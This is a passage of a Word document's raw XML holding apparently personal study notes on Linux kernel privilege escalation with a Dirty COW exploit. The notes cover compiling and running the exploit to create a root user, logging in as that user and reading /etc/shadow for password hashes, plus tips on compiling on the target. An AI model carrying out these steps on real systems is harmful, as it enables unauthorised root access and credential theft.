      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pthread</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>name_exploit.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -o  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>name_exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lcrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7B830F8E" w14:textId="3E13D077" w:rsidR="00BD635A" w:rsidRDefault="00326CDC">
      <w:r>
        <w:t>Ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334E06CB" w14:textId="77777777" w:rsidR="00326CDC" w:rsidRDefault="00326CDC" w:rsidP="00326CDC">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> +x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>name_exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402F312B" w14:textId="77777777" w:rsidR="00326CDC" w:rsidRDefault="00326CDC" w:rsidP="00326CDC">
      <w:r>
        <w:t>./</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD635A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>name_exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (give the password that you want to set as mention in the description of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit_db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEF7D16" w14:textId="417B518E" w:rsidR="00326CDC" w:rsidRDefault="00326CDC"/>
    <w:p w14:paraId="1233404A" w14:textId="5739CA95" w:rsidR="0006038C" w:rsidRDefault="00503D4E">
      <w:r>
        <w:t>Cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3A2DFE" w14:textId="77E37D94" w:rsidR="00503D4E" w:rsidRDefault="00503D4E">
      <w:r>
        <w:t>#it show the created  user with the root privilege.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CFEDD1" w14:textId="0F5D415E" w:rsidR="00503D4E" w:rsidRDefault="00503D4E">
      <w:r>
        <w:t xml:space="preserve">Su </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>name_of_created_user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="18C4B66C" w14:textId="25BDE8A0" w:rsidR="00503D4E" w:rsidRDefault="00503D4E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"># if it gives error then </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019203FE" w14:textId="3870E930" w:rsidR="00503D4E" w:rsidRDefault="00503D4E" w:rsidP="00503D4E">
      <w:r>
        <w:t xml:space="preserve">Ssh </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>name_of_created_user</w:t>
      </w:r>
      <w:r>
        <w:t>@target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6EE9C2BF" w14:textId="77777777" w:rsidR="00503D4E" w:rsidRDefault="00503D4E" w:rsidP="00503D4E"/>
    <w:p w14:paraId="4C2238B9" w14:textId="17959CED" w:rsidR="001A650F" w:rsidRDefault="001A650F" w:rsidP="00503D4E">
      <w:r>
        <w:t># then it  give the access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02293C6C" w14:textId="65F514C9" w:rsidR="001A650F" w:rsidRDefault="001A650F" w:rsidP="00503D4E">
      <w:r>
        <w:t>Apt-get update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D8F4F2" w14:textId="77777777" w:rsidR="001A650F" w:rsidRDefault="001A650F" w:rsidP="00503D4E"/>
    <w:p w14:paraId="2729C42B" w14:textId="13ADA7F6" w:rsidR="0025006D" w:rsidRDefault="0025006D" w:rsidP="00503D4E">
      <w:r>
        <w:t xml:space="preserve">#the user get the administrator </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>prviliges</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1B9B77D4" w14:textId="445F0027" w:rsidR="0025006D" w:rsidRDefault="0025006D" w:rsidP="00503D4E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0A02DB15" w14:textId="26858A87" w:rsidR="0025006D" w:rsidRDefault="0025006D" w:rsidP="00503D4E"/>
    <w:p w14:paraId="262C2439" w14:textId="71642CD8" w:rsidR="0025006D" w:rsidRDefault="0025006D" w:rsidP="00503D4E">
      <w:r>
        <w:t>Cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E1BAE5" w14:textId="1F7E4C9C" w:rsidR="0025006D" w:rsidRDefault="0025006D" w:rsidP="00503D4E">
      <w:r>
        <w:t xml:space="preserve">#this file is only accessible to the user with the root privileges as it contain the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> hash of users password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004B7DE2" w14:textId="77777777" w:rsidR="0025006D" w:rsidRDefault="0025006D" w:rsidP="00503D4E"/>
    <w:p w14:paraId="074523D3" w14:textId="77777777" w:rsidR="0025006D" w:rsidRDefault="0025006D" w:rsidP="00503D4E"/>
    <w:p w14:paraId="5632B690" w14:textId="59AFCDC9" w:rsidR="00503D4E" w:rsidRDefault="00503D4E"/>
    <w:p w14:paraId="53430B53" w14:textId="77777777" w:rsidR="0006038C" w:rsidRDefault="0006038C"/>
    <w:p w14:paraId="2B2D153B" w14:textId="77777777" w:rsidR="004774F5" w:rsidRDefault="004774F5"/>
    <w:p w14:paraId="7C774FE3" w14:textId="77777777" w:rsidR="006012BD" w:rsidRDefault="006012BD"/>
    <w:p w14:paraId="6EE21585" w14:textId="77777777" w:rsidR="00226796" w:rsidRDefault="00226796"/>
    <w:p w14:paraId="7B60AAA7" w14:textId="77777777" w:rsidR="00226796" w:rsidRDefault="00226796"/>
    <w:p w14:paraId="2D447C0A" w14:textId="77777777" w:rsidR="00226796" w:rsidRDefault="00226796"/>
    <w:p w14:paraId="253BB74D" w14:textId="7EF3D8D0" w:rsidR="00FC581B" w:rsidRPr="004206A8" w:rsidRDefault="00FC581B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004206A8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NOTE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0F0FFA" w14:textId="6161762B" w:rsidR="00FC581B" w:rsidRDefault="00FC581B">
      <w:r>
        <w:t>Exploit codes are mostly in the c language.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB2E380" w14:textId="08B3C873" w:rsidR="0000207C" w:rsidRDefault="00226796">
      <w:r>
        <w:t xml:space="preserve">If we run the exploit that is not </w:t>
      </w:r>
      <w:r w:rsidR="0000207C">
        <w:t>compatible to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the kernel version or distribution</w:t>
      </w:r>
      <w:r w:rsidR="0000207C">
        <w:t xml:space="preserve"> then I will mostly crashes</w:t>
      </w:r>
      <w:r w:rsidR="00D80ADB">
        <w:t>/panic</w:t>
      </w:r>
      <w:r w:rsidR="0000207C">
        <w:t xml:space="preserve"> the kernel</w:t>
      </w:r>
      <w:r w:rsidR="00D80ADB">
        <w:t xml:space="preserve"> that lead to data loss</w:t>
      </w:r>
      <w:r w:rsidR="0000207C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C68FF7F" w14:textId="762B5C67" w:rsidR="00D80ADB" w:rsidRDefault="006012BD">
      <w:r w:rsidRPr="006012BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>www-data :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is a service account it  is used to manage the webserver.(it is unprivileged)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D174E68" w14:textId="77777777" w:rsidR="0006038C" w:rsidRDefault="0006038C" w:rsidP="0006038C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">#some </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> kernel exploit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>doesnot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> have the compilation instruction available so we to research in this case.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E532E0" w14:textId="6E4759DD" w:rsidR="00BD635A" w:rsidRDefault="00BD635A" w:rsidP="00BD635A">
      <w:r>
        <w:t>#if it gives the error</w:t>
      </w:r>
      <w:r>
        <w:t>(binary run)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that is due to that it is not compiled on that target system, so to remove this error we upload the uncompiled file and then complied it on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189D1A88" w14:textId="77777777" w:rsidR="006012BD" w:rsidRDefault="006012BD"/>
    <w:p w14:paraId="29D24238" w14:textId="610FD2F3" w:rsidR="00503D4E" w:rsidRDefault="00503D4E">
      <w:r>
        <w:t xml:space="preserve">It create the user with the root </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>prvilege</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  and the password is what that we provided while running it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4DF202" w14:textId="77777777" w:rsidR="00503D4E" w:rsidRDefault="00503D4E"/>
    <w:p w14:paraId="40A72601" w14:textId="77777777" w:rsidR="00503D4E" w:rsidRDefault="00503D4E"/>
    <w:p w14:paraId="6E3A7252" w14:textId="77777777" w:rsidR="0000207C" w:rsidRDefault="0000207C"/>
    <w:p w14:paraId="438452EB" w14:textId="3FCE73BA" w:rsidR="00FC581B" w:rsidRDefault="00226796">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00FC5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D49A2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FF3AF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150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19E"/>
    <w:rsid w:val="0000207C"/>
    <w:rsid w:val="0006038C"/>
    <w:rsid w:val="001A650F"/>
    <w:rsid w:val="00226796"/>
    <w:rsid w:val="0025006D"/>
    <w:rsid w:val="00326CDC"/>
    <w:rsid w:val="004206A8"/>
    <w:rsid w:val="00474C1A"/>
    <w:rsid w:val="004774F5"/>
    <w:rsid w:val="00503D4E"/>
    <w:rsid w:val="0054632C"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="006012BD"/>
    <w:rsid w:val="006B2E6F"/>
    <w:rsid w:val="007A1B57"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00867C22"/>
    <w:rsid w:val="00A41C16"/>
    <w:rsid w:val="00A8119E"/>
    <w:rsid w:val="00B1450D"/>
    <w:rsid w:val="00B55176"/>
    <w:rsid w:val="00B73823"/>
    <w:rsid w:val="00BD635A"/>
    <w:rsid w:val="00C4483E"/>
    <w:rsid w:val="00C47B7E"/>
    <w:rsid w:val="00C839F6"/>
    <w:rsid w:val="00CF2833"/>
    <w:rsid w:val="00D80ADB"/>
    <w:rsid w:val="00EF3845"/>
    <w:rsid w:val="00FC5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86EEB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E9789D5B-C83A-451B-9750-4C2E8E9D0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19E"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00A81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19E"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00A8119E"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00A8119E"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00A8119E"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00A81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19E"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00A8119E"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004206A8"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00420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tmp"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/408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mp"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/The-Z-Labs/linux-exploit-suggester" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dirtycow.ninja/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.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6</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49</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-19T14:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-19T16:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>